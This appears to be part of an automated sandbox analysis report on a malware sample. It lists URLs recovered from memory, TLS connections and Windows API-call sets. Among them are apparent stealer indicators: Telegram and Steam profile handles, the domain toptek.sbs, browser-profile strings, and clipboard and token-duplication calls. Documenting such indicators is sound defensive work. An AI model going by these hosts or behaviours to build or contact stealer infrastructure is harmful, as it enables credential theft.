                Source: chrome.exe, 0000000F.00000003.2072617202.0000335C0271C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2065904669.0000335C0271C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077118601.0000335C0272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Dry.com, 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Dry.com, 0000000A.00000002.2458694756.0000000001616000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Dry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Dry.com, 0000000A.00000002.2458694756.0000000001616000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Dry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Dry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/2
                Source: Dry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Dry.com, 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FDD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelr
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelt
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                Source: Dry.com, 0000000A.00000002.2461862261.000000000413C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbses
                Source: Dry.com, 0000000A.00000002.2461862261.000000000400C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FB9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsosh;
                Source: Dry.com, 0000000A.00000002.2461862261.0000000003FDD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Dry.com.1.dr, Saved.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Saved.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs3
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icocom/3625
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoesizing
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074815994.0000335C02A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2079047729.0000335C03034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2078148106.0000335C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2079047729.0000335C03034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 9EI7wrGs4K.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00B5F7C7
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00B5F55C
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B79FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00B79FD2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00AFFFE0 CloseHandle,NtProtectVirtualMemory,10_2_00AFFFE0
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B54763 GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00B54763
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00B41B4D
